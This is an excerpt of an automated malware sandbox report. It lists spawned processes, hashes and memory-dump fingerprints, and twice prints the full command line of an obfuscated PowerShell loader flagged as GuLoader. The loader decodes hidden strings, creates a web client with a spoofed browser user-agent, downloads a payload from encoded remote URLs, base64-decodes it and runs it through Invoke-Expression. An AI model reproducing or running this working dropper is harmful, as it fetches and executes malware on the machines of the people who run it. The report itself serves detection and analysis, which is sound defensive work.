                                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Columbusgs='Reallnningernes';;$Cares='Doegling';;$Novela='Dyrkere55';;$Pigesjovetridiocyte='Teister';;$peacefuller=$host.Name;function Multiplum($Pousserer){If ($peacefuller) {$Exitskiltes=2} for ($Pigesjovet=$Exitskiltes;;$Pigesjovet+=3){if(!$Pousserer[$Pigesjovet]){cls;break }$Vandstande+=$Pousserer[$Pigesjovet];$Fiskeinteressernes='Unmoralises'}$Vandstande}function Unchanneled($Pigesjovetmmunotoxin){ .($instrumentalis) ($Pigesjovetmmunotoxin)}$Kvabserne=Multiplum 'SpnOreActdu.D.W';$Kvabserne+=Multiplum 'AvE bPscMalDeIC ESlnCeT';$Bugfish=Multiplum ' fM.joD.zBeiLalAslF a i/';$Exosperm=Multiplum 'OpTStlSksRa1 .2';$Bagprojektion121='go[.an,oESltAd.OssK e,ar,aV AiGrC,fe OP poslIManTeT.rm rADdNP,a UgDaE,lrv.].j:,u: ,sS EMuCCeuRyrR.iRetK.YBap NRU o Tt UoHect OAnL H= .$ SeRoX lO ssMip nEVaRVam';$Bugfish+=Multiplum 'Ar5R .Kn0.o (gjWFoiP nM.d roBewdrs , VoNStTs Rv1Un0Re.Dr0V,;T UtWstiAnn,e6P,4Br; S Sux 6 N4En;T .urD vSt: E1Pr3Co1r .D.0s )Fl BaG eeR c GkPaoEn/Ja2 s0 U1fu0 C0L,1 l0Ha1Wa oF .iMirMleFufu osuxFo/ M1M 3.k1ny.sn0';$Whitefishery=Multiplum ',iuCiS yeHurVe- oAUngGhEIbN Rt';$Knysten=Multiplum 'Vah it ,t,tp.is S:Fr/Ec/,rwMewSew,i..epGuuBenSpeF.eretSl.,gaS e E/Hei.nt S/AnKKoo Gn utJvrPeaScs nt nrPai .g tsh.L mSes o n>N.hU t t ApCosCo: S/On/ rwL,wBlw U.Prf VtBesH e n hgGei inCaeFieJ rFrs t. .cV o LmP /gei ItCl/MiKCaoOrn otEmrAnaA sTotP r,miByg,itVe.HamB s Eo';$Tikronesedler=Multiplum 'Sm>';$instrumentalis=Multiplum 'SpISpe vX';$Ribboned46='Treater';$fabriksvarerne='\Pharmacists201.Str';Unchanneled (Multiplum 'un$Chg yL uO .BGea VLTi:SisVsAB L aTDvI CNBte Rs T=,n$ E HN.aVA.:GrAOvp ,PSrd CaS,TR aHn+ t$UnfPrASeBUdRMaI KByS EVReAInrA e krRaN oE');Unchanneled (Multiplum 'Af$SpGCaL aoI BElA rLRo:,as JInUs S.jKseeGim rI.lK,pkVoeLilPa= D$D.KSanS.YHaSTit EMenst. s .PboLdiIVit,a(As$U T riEnks,r Uo.aNFeeExsBre ADKolO.E.rRSy)');Unchanneled (Multiplum $Bagprojektion121);$Knysten=$Sjuskemikkel[0];$Thyreoid=(Multiplum ' l$P gN,lSlOF,BHaAPelOv:PeI.oN v aAPoLToIRed FET,f ODaRAasN I akM.R GILenD G U=EnN oE IW -Reo .bKnJNuE dCPuT,c A S rYLaSI,tBreDrm a.H.$ Ak vnoABoB es e PR hnKaE');Unchanneled ($Thyreoid);Unchanneled (Multiplum 'Pr$ PISan v aa l ,i ad eCofthoBirBisT,iRek or i fnPegUn.M HpreCoa dAfe DrSlss [by$ WLah Fi BtF eHef DiAds ohCoeArr yIo]Ce=W $ToBTiuP.g yf ,iF sUnh');$Reedmaker=Multiplum ' r$RaIUsn RvSea,al ai,mdFleAffT oFirK sGliKok PrV,iAvnFrg a.SeDJaoCew AnR,lT.ogra TdScFV i nlAne (De$KaKChnPlyFlsKltA,eQ,nm.,In$ Ap Ge DnMosMiiTiozanKvs,maCildrd IeSurNo)';$pensionsalder=$Saltines;Unchanneled (Multiplum 'eg$MeGF LTeoJabRiAr.LAl:,bK TIh DCeDBeiF.ES SMa=Ga(Get He,rSDitSa-AdpStaShTGehBe ,a$Kop TeLaN,eSB,i o fn sMaARalBeDPoeSeRpa)');while (!$Kiddies) {Unchanneled (Multiplum 'Hy$AngInlP oelbIma FlR,: FUU dSegnoaTevTueSp=Ar$ nP,kiFogDreAks AjMeoEjvR ebetUdn Ut AecarHui umSms alRus nbriStnH.gPh8') ;Unchanneled $Reedmaker;Unchanneled (Multiplum 'I sPlTFoARhR Ht S-Rus nLSte .E yp A U.4');Unchanneled (Multiplum 'Fr$T GOvlGioP.bHyaSnLF.: HkNeIA.dHud AI.eEe SKo=Au(Mat ,EPoSimtFu-MoPTuATrtMah E Ho$ pB EM nf s DiP.OFoNFosNeA LStD,iEsar e)') ;Unchanneled (Multiplum ' V$SkgUdlKao LbAdAI.l o:HyRSpOT,mO B mEClSUn=B,$VogBalG,ORabbiaJolS :AnIMoo oDTeiP.dPrS ,+Fe+Ri%Ki$ SS CJMiUshSPrkS.eDeMtaiAsKNoKrueRiLAn. CCChoU.UDenStT') ;$Knysten=$Sjuskemikkel[$Rombes]}$Balletkorpsets=301384;$Afledtes=28316;Unchanneled (Multiplum 'Fo$Rhg oLMioMubnoaC,lAu: TaMoufrgBoUR sLitFos.eNDed AScg , V.= u pag Be,stBa-UnC,ooSkN Mt SELeNReT.e Pa$,ep aE NSuS ,i SOAsnO,s.baFrL BdSkEpaR');Unchanneled (Multiplum 'Sk$Drg.elJoo,ab taKol S:SeRDkigep PiE eJunRyiSlsSktBu A=Re l[ReS ,y ys MtLre Smhe.lnCGao an v Ce .rHjtNu]Te:Se:etFGarMaoKhm cB.la SsRee .6Un4faS GtaarSui OnTrg r(F $ A Ju UgThususSut HsD nAndAtaTug m)');Unchanneled (Multiplum 'Co$HaGsklFloInbDeaTrLSa:SiEPel ,eD kV T RFuo it eo.KIcN,uIAckE kHiES,rHi In=Mi S [ rSOtyM SOvtH eSnmSp.deTA eAnx ,t.f. E iNnaC roLudBlI,onIng.e] e:b :AgAFjSS C I KISk.BegKleS,t Ns KTPeRS I Sn RG b( x$ .R ,IMapMaiSteS NLeImaSDyTU )');Unchanneled (Multiplum ' .$ScgArlp,oToBO a hLGr:Opb PuT,zDiZ.ma,rRSydFo=Em$DyE el Te rK TR,R oOMaTTrEU.K.hN BISyK.lKSpEF r C. Ns uB BDis FTWurPrIFoNbiGFu( .$ FBR aGeL nLDie nTShK.oOCrRNepKrS VESutJ,sI ,,a$HaAUnf.eLSteluDC.tL ed.sE )');Unchanneled $Buzzard;"
                                                                                                        Imagebase:0x7ff6cb6b0000
                                                                                                        File size:452'608 bytes
                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.1713743041.00000263F1724000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:8
                                                                                                        Start time:07:48:21
                                                                                                        Start date:09/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff6ee680000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:high
                                                                                                        Has exited:true

                                                                                                        Target ID:10
                                                                                                        Start time:07:48:32
                                                                                                        Start date:09/12/2024
                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Columbusgs='Reallnningernes';;$Cares='Doegling';;$Novela='Dyrkere55';;$Pigesjovetridiocyte='Teister';;$peacefuller=$host.Name;function Multiplum($Pousserer){If ($peacefuller) {$Exitskiltes=2} for ($Pigesjovet=$Exitskiltes;;$Pigesjovet+=3){if(!$Pousserer[$Pigesjovet]){cls;break }$Vandstande+=$Pousserer[$Pigesjovet];$Fiskeinteressernes='Unmoralises'}$Vandstande}function Unchanneled($Pigesjovetmmunotoxin){ .($instrumentalis) ($Pigesjovetmmunotoxin)}$Kvabserne=Multiplum 'SpnOreActdu.D.W';$Kvabserne+=Multiplum 'AvE bPscMalDeIC ESlnCeT';$Bugfish=Multiplum ' fM.joD.zBeiLalAslF a i/';$Exosperm=Multiplum 'OpTStlSksRa1 .2';$Bagprojektion121='go[.an,oESltAd.OssK e,ar,aV AiGrC,fe OP poslIManTeT.rm rADdNP,a UgDaE,lrv.].j:,u: ,sS EMuCCeuRyrR.iRetK.YBap NRU o Tt UoHect OAnL H= .$ SeRoX lO ssMip nEVaRVam';$Bugfish+=Multiplum 'Ar5R .Kn0.o (gjWFoiP nM.d roBewdrs , VoNStTs Rv1Un0Re.Dr0V,;T UtWstiAnn,e6P,4Br; S Sux 6 N4En;T .urD vSt: E1Pr3Co1r .D.0s )Fl BaG eeR c GkPaoEn/Ja2 s0 U1fu0 C0L,1 l0Ha1Wa oF .iMirMleFufu osuxFo/ M1M 3.k1ny.sn0';$Whitefishery=Multiplum ',iuCiS yeHurVe- oAUngGhEIbN Rt';$Knysten=Multiplum 'Vah it ,t,tp.is S:Fr/Ec/,rwMewSew,i..epGuuBenSpeF.eretSl.,gaS e E/Hei.nt S/AnKKoo Gn utJvrPeaScs nt nrPai .g tsh.L mSes o n>N.hU t t ApCosCo: S/On/ rwL,wBlw U.Prf VtBesH e n hgGei inCaeFieJ rFrs t. .cV o LmP /gei ItCl/MiKCaoOrn otEmrAnaA sTotP r,miByg,itVe.HamB s Eo';$Tikronesedler=Multiplum 'Sm>';$instrumentalis=Multiplum 'SpISpe vX';$Ribboned46='Treater';$fabriksvarerne='\Pharmacists201.Str';Unchanneled (Multiplum 'un$Chg yL uO .BGea VLTi:SisVsAB L aTDvI CNBte Rs T=,n$ E HN.aVA.:GrAOvp ,PSrd CaS,TR aHn+ t$UnfPrASeBUdRMaI KByS EVReAInrA e krRaN oE');Unchanneled (Multiplum 'Af$SpGCaL aoI BElA rLRo:,as JInUs S.jKseeGim rI.lK,pkVoeLilPa= D$D.KSanS.YHaSTit EMenst. s .PboLdiIVit,a(As$U T riEnks,r Uo.aNFeeExsBre ADKolO.E.rRSy)');Unchanneled (Multiplum $Bagprojektion121);$Knysten=$Sjuskemikkel[0];$Thyreoid=(Multiplum ' l$P gN,lSlOF,BHaAPelOv:PeI.oN v aAPoLToIRed FET,f ODaRAasN I akM.R GILenD G U=EnN oE IW -Reo .bKnJNuE dCPuT,c A S rYLaSI,tBreDrm a.H.$ Ak vnoABoB es e PR hnKaE');Unchanneled ($Thyreoid);Unchanneled (Multiplum 'Pr$ PISan v aa l ,i ad eCofthoBirBisT,iRek or i fnPegUn.M HpreCoa dAfe DrSlss [by$ WLah Fi BtF eHef DiAds ohCoeArr yIo]Ce=W $ToBTiuP.g yf ,iF sUnh');$Reedmaker=Multiplum ' r$RaIUsn RvSea,al ai,mdFleAffT oFirK sGliKok PrV,iAvnFrg a.SeDJaoCew AnR,lT.ogra TdScFV i nlAne (De$KaKChnPlyFlsKltA,eQ,nm.,In$ Ap Ge DnMosMiiTiozanKvs,maCildrd IeSurNo)';$pensionsalder=$Saltines;Unchanneled (Multiplum 'eg$MeGF LTeoJabRiAr.LAl:,bK TIh DCeDBeiF.ES SMa=Ga(Get He,rSDitSa-AdpStaShTGehBe ,a$Kop TeLaN,eSB,i o fn sMaARalBeDPoeSeRpa)');while (!$Kiddies) {Unchanneled (Multiplum 'Hy$AngInlP oelbIma FlR,: FUU dSegnoaTevTueSp=Ar$ nP,kiFogDreAks AjMeoEjvR ebetUdn Ut AecarHui umSms alRus nbriStnH.gPh8') ;Unchanneled $Reedmaker;Unchanneled (Multiplum 'I sPlTFoARhR Ht S-Rus nLSte .E yp A U.4');Unchanneled (Multiplum 'Fr$T GOvlGioP.bHyaSnLF.: HkNeIA.dHud AI.eEe SKo=Au(Mat ,EPoSimtFu-MoPTuATrtMah E Ho$ pB EM nf s DiP.OFoNFosNeA LStD,iEsar e)') ;Unchanneled (Multiplum ' V$SkgUdlKao LbAdAI.l o:HyRSpOT,mO B mEClSUn=B,$VogBalG,ORabbiaJolS :AnIMoo oDTeiP.dPrS ,+Fe+Ri%Ki$ SS CJMiUshSPrkS.eDeMtaiAsKNoKrueRiLAn. CCChoU.UDenStT') ;$Knysten=$Sjuskemikkel[$Rombes]}$Balletkorpsets=301384;$Afledtes=28316;Unchanneled (Multiplum 'Fo$Rhg oLMioMubnoaC,lAu: TaMoufrgBoUR sLitFos.eNDed AScg , V.= u pag Be,stBa-UnC,ooSkN Mt SELeNReT.e Pa$,ep aE NSuS ,i SOAsnO,s.baFrL BdSkEpaR');Unchanneled (Multiplum 'Sk$Drg.elJoo,ab taKol S:SeRDkigep PiE eJunRyiSlsSktBu A=Re l[ReS ,y ys MtLre Smhe.lnCGao an v Ce .rHjtNu]Te:Se:etFGarMaoKhm cB.la SsRee .6Un4faS GtaarSui OnTrg r(F $ A Ju UgThususSut HsD nAndAtaTug m)');Unchanneled (Multiplum 'Co$HaGsklFloInbDeaTrLSa:SiEPel ,eD kV T RFuo it eo.KIcN,uIAckE kHiES,rHi In=Mi S [ rSOtyM SOvtH eSnmSp.deTA eAnx ,t.f. E iNnaC roLudBlI,onIng.e] e:b :AgAFjSS C I KISk.BegKleS,t Ns KTPeRS I Sn RG b( x$ .R ,IMapMaiSteS NLeImaSDyTU )');Unchanneled (Multiplum ' .$ScgArlp,oToBO a hLGr:Opb PuT,zDiZ.ma,rRSydFo=Em$DyE el Te rK TR,R oOMaTTrEU.K.hN BISyK.lKSpEF r C. Ns uB BDis FTWurPrIFoNbiGFu( .$ FBR aGeL nLDie nTShK.oOCrRNepKrS VESutJ,sI ,,a$HaAUnf.eLSteluDC.tL ed.sE )');Unchanneled $Buzzard;"
                                                                                                        Imagebase:0x6d0000
                                                                                                        File size:433'152 bytes
                                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000A.00000002.2781375941.0000000005309000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                        Reputation:high
                                                                                                        Has exited:false

                                                                                                        Target ID:11
                                                                                                        Start time:07:48:32
                                                                                                        Start date:09/12/2024
                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        Imagebase:0x7ff7194a0000
                                                                                                        File size:862'208 bytes
                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:12
                                                                                                        Start time:07:48:43
                                                                                                        Start date:09/12/2024
                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Public\bsxhli2ob.xlsx"
                                                                                                        Imagebase:0xf60000
                                                                                                        File size:53'161'064 bytes
                                                                                                        MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:15
                                                                                                        Start time:07:48:46
                                                                                                        Start date:09/12/2024
                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                        Imagebase:0x7ff67e6d0000
                                                                                                        File size:55'320 bytes
                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:false

                                                                                                        Target ID:19
                                                                                                        Start time:07:49:49
                                                                                                        Start date:09/12/2024
                                                                                                        Path:C:\Windows\splwow64.exe
                                                                                                        Wow64 process (32bit):false
                                                                                                        Commandline:C:\Windows\splwow64.exe 8192
                                                                                                        Imagebase:0x7ff605270000
                                                                                                        File size:163'840 bytes
                                                                                                        MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                        Has elevated privileges:false
                                                                                                        Has administrator privileges:false
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Has exited:true

                                                                                                        Reset < >
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.2852283934.00007FFB4AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_7ffb4ae80000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                          • Instruction ID: 01c0898fe9383dad6563b6cea9dee2917056aeb892134ada66253a8d94f44d72
                                                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                          • Instruction Fuzzy Hash: 0E01A77010CB0C8FDB44EF0CE051AA5B3E0FB89320F10056DE58AC3651DA32E882CB41
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1725470548.00007FFB4AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4af70000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9dc0a325bb3dd9c668abdba86e7348f68e780048257233191b1a518f5754e7f7
                                                                                                          • Instruction ID: de0124b12dbf7975058b0fd54b47f0f86bd55a698e7c74335dbcad5277897efe
                                                                                                          • Opcode Fuzzy Hash: 9dc0a325bb3dd9c668abdba86e7348f68e780048257233191b1a518f5754e7f7
                                                                                                          • Instruction Fuzzy Hash: 4A02E4A290EBC64FE797AF7888511A87FE1EF56210F5901FBD4C8C71D3DA186C0A8752
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1724680584.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4aea0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5b0d53eab28698a5aa29fb3a16489cb8871c1555efb43531ef3d3a242eae4447
                                                                                                          • Instruction ID: 5c0a421b67fe9bfc81034d31a54cef2c0b6ca2ffbf9602ae5589da6ff28c9846
                                                                                                          • Opcode Fuzzy Hash: 5b0d53eab28698a5aa29fb3a16489cb8871c1555efb43531ef3d3a242eae4447
                                                                                                          • Instruction Fuzzy Hash: 36F1B47090CB8D8FEBA9EF28C8557E977D1FF54310F5482AAE85DC7291CB3499418B82
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1724680584.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4aea0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8983406f8f0e72a467c15d68bd84d8e60bdf792fea2ab77d12ea4fb63ee43763
                                                                                                          • Instruction ID: a09f7d660c16db55d4acf6e3fe5c9762cf416f41541dbb6dbcf398d9e191e78d
                                                                                                          • Opcode Fuzzy Hash: 8983406f8f0e72a467c15d68bd84d8e60bdf792fea2ab77d12ea4fb63ee43763
                                                                                                          • Instruction Fuzzy Hash: CCE1B47090CA4E8FEBA8EF28C8557E977E1FF54310F24426AD85DC7291DE74A9418B81
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1724680584.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4aea0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: pL_^
                                                                                                          • API String ID: 0-2181772876
                                                                                                          • Opcode ID: 78663055388ebc3b668182f9b9933c800c8ba2e30b0b6d92cd36427f30ea1641
                                                                                                          • Instruction ID: 7535b2aa3e24b2ae5d4584357979560ef80572d1afa8a50d869c40b9f57037e0
                                                                                                          • Opcode Fuzzy Hash: 78663055388ebc3b668182f9b9933c800c8ba2e30b0b6d92cd36427f30ea1641
                                                                                                          • Instruction Fuzzy Hash: FA028271A0CA4D8FDB89EF6CC495AAD7BE1FF58300F2441AAE44DD7296CA74E841C781
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1725470548.00007FFB4AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4af70000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ab9e22d7b6aa99cecaf74639e14ee252a7d59f706a5ddccbcca0ee4e5889f0d9
                                                                                                          • Instruction ID: 108ff956271c2e4c76bd6a8299e99a8f9ee93a26ea6f26c270280d2379455046
                                                                                                          • Opcode Fuzzy Hash: ab9e22d7b6aa99cecaf74639e14ee252a7d59f706a5ddccbcca0ee4e5889f0d9
                                                                                                          • Instruction Fuzzy Hash: 93F116A690DB854FE79AAF38C8552787BE1EF56210F6801FBD48CC71D3DE18AC468742
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1725470548.00007FFB4AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4af70000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a88c98e0b6ac8d19c448967257fc250da12f54519a14bc8a23b5382f84499a9e
                                                                                                          • Instruction ID: 1b195dade48aeafdacd91f851056c2213c0eccda0ed363299f65156b72eced89
                                                                                                          • Opcode Fuzzy Hash: a88c98e0b6ac8d19c448967257fc250da12f54519a14bc8a23b5382f84499a9e
                                                                                                          • Instruction Fuzzy Hash: 41E1E8A690DBC60FE3E6BF7888655797FE5EF42210B6801FED4C9C71D3D91868068352
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1725470548.00007FFB4AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4af70000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: fd11c4552928126e5307ab93fbfaa4ffa79989a7a2bd553cf28612b7e4b12457
                                                                                                          • Instruction ID: aedc028c8ed512330ed46162f640cad1173221022c6feff40fb7266423c57339
                                                                                                          • Opcode Fuzzy Hash: fd11c4552928126e5307ab93fbfaa4ffa79989a7a2bd553cf28612b7e4b12457
                                                                                                          • Instruction Fuzzy Hash: 49D126A2A0DB890FE796EF7898555B8BBE1EF56310B1801FBC48DC71D3D918AC478391
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1725470548.00007FFB4AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4af70000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: f76177f9ef3a530f45d250e1190c2c56690ecc91374d946749c71aa1e345fcf8
                                                                                                          • Instruction ID: 707aa63347556f0969b5504a5438995c731574d8084b6c4a8146ea3993fd8f51
                                                                                                          • Opcode Fuzzy Hash: f76177f9ef3a530f45d250e1190c2c56690ecc91374d946749c71aa1e345fcf8
                                                                                                          • Instruction Fuzzy Hash: F1E1C6A2A0DB864FE799EE7888551787BE5EF55310F1801FED48CC71C3EE28AC468381
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1725470548.00007FFB4AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4af70000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 40335f91adabd92206b7915a94a151f282fe3a04f530725b9f4742d4bb921ed0
                                                                                                          • Instruction ID: 9d3cead027dee5c5430e90053811eff2d1d23e92d97d087c14bfc09c21a1d1a5
                                                                                                          • Opcode Fuzzy Hash: 40335f91adabd92206b7915a94a151f282fe3a04f530725b9f4742d4bb921ed0
                                                                                                          • Instruction Fuzzy Hash: 83B132E2A2DF9A4FE7A6EF7888555797BE5EF45310B2800FAD48CC71D2D918AC058381
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1724680584.00007FFB4AEA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AEA0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4aea0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e3d1fddb3db8d8201ae8119fc07afd35c2e676ede69f1d6e3e458a497fe8ab3b
                                                                                                          • Instruction ID: e964169a840dee1543340909c7d7237eef7868c5d69defa00fe0f361cc5fcaef
                                                                                                          • Opcode Fuzzy Hash: e3d1fddb3db8d8201ae8119fc07afd35c2e676ede69f1d6e3e458a497fe8ab3b
                                                                                                          • Instruction Fuzzy Hash: 17B1D77050CA8D8FDB69EF28C8557E93BE1FF69310F14426EE84DC7291CA74A941CB82
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1725470548.00007FFB4AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4af70000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: c21114b6d9e626a05236f1cf65e961836fa4ea4a34db9b70dda6762f42fcc350
                                                                                                          • Instruction ID: cb0b4425c18a5f2f687609a1212059de7b96c153a70da1370686fae8d2f55aa5
                                                                                                          • Opcode Fuzzy Hash: c21114b6d9e626a05236f1cf65e961836fa4ea4a34db9b70dda6762f42fcc350
                                                                                                          • Instruction Fuzzy Hash: DD411262A0DA894FEB96EE78C8945A97BE1EF55311B5800FBD48CC71D3DA14AC09C781
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1725470548.00007FFB4AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4af70000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: ef8ecc5f5c3d241ef4cac449b585261219b65eaa09d469f2b4304c0eed005eda
                                                                                                          • Instruction ID: 4bede39cd9babff7bb8dddf75b22926824afb5ed931aef24d3e0519f8bd5b272
                                                                                                          • Opcode Fuzzy Hash: ef8ecc5f5c3d241ef4cac449b585261219b65eaa09d469f2b4304c0eed005eda
                                                                                                          • Instruction Fuzzy Hash: 5D31B362A0DB8A4FEB96AE78885557D7FE1EF56310B5800FBD48CCB0D3C9186C4A8752
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000007.00000002.1725470548.00007FFB4AF70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_7_2_7ffb4af70000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cef32c57d6befc4df19bf603df45bfbde5401329ce657c8a7ad69e3bd8857b89
